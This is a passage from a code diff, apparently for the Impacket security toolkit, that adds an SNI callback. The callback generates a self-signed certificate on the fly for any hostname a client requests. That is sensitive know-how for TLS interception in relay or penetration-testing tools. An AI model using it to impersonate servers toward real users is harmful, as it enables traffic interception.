Optional[str], + ssl_context: ssl.SSLContext): + """ Callback, called when client send SNI """ + if not sni_name: + return None + + certificate, private_key = generate_self_signed_certificate(certificate_string=sni_name) + + ssl_sock.context.use_certificate(certificate) + ssl_sock.context.use_privatekey(private_key) + + +def generate_self_signed_certificate(certificate_string: str="Impacket") -> Tuple[str, str]: + ''' Generate a new self-signed certificate''' + private_key = rsa.generate_private_key( + public_exponent=65537, + key_size=2048, + ) + + # Subject Information + subject = x509.Name([ + x509.NameAttribute(NameOID.COUNTRY_NAME, "US"), + x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Organization of Information Security Research"), + x509.NameAttribute(NameOID.COMMON_NAME, certificate_string), + ]) + + # Issuer information (self-signed) + issuer = subject + + # Certification create + builder = x509.CertificateBuilder() + + builder = builder.subject_name(subject) + builder = builder.issuer_name(issuer) + builder = builder.public_key(private_key.public_key()) + builder = builder.serial_number(x509.random_serial_number()) + builder = builder.not_valid_before(datetime.datetime.now(datetime.UTC)) + builder = builder.not_valid_after(datetime.datetime.now(datetime.UTC) + datetime.timedelta(days=365)) + + # 1. Add keyUsage + builder = builder.add_extension( + x509.KeyUsage( + digital_signature=True, + content_commitment=False, + key_encipherment=True, + data_encipherment=False, + key_agreement=False, + key_cert_sign=False, + crl_sign=False, + encipher_only=False, + decipher_only=False, + ), + critical=True + ) + + # 2. Add basicConstraints + builder = builder.add_extension( + x509.BasicConstraints(ca=False, path_length=None), + critical=True + ) + + try: + sni_ip = ipaddress.IPv4Address(certificate_string) + except ipaddress.AddressValueError: + sni_ip = None + sans = [] + if sni_ip is None: + sans.append(x509.DNSName(certificate_string)) + try: + sni_ip = socket.gethostbyname(certificate_string) + sans.append(x509.IPAddress(ipaddress.IPv4Address(sni_ip))) + except socket.gaierror: + pass + else: + sans.append(x509.IPAddress(sni_ip)) + + + # 3. ADD subjectAltName + builder = builder.add_extension( + x509.SubjectAlternativeName(sans), + critical=False + ) + + # Extended Key Usage + builder = builder.add_extension( + x509.ExtendedKeyUsage([ + x509.oid.ExtendedKeyUsageOID.SERVER_AUTH + ]), + critical=False + ) + # Sign certificate + certificate = builder.sign( + private_key=private_key, + algorithm=hashes.SHA256(), + ) + return certificate.public_bytes(encoding=serialization.Encoding.PEM), private_key.private_bytes(encoding=serialization.Encoding.PEM, + format=serialization.PrivateFormat.PKCS8, + encryption_algorithm=serialization.NoEncryption()) \ No newline at end of file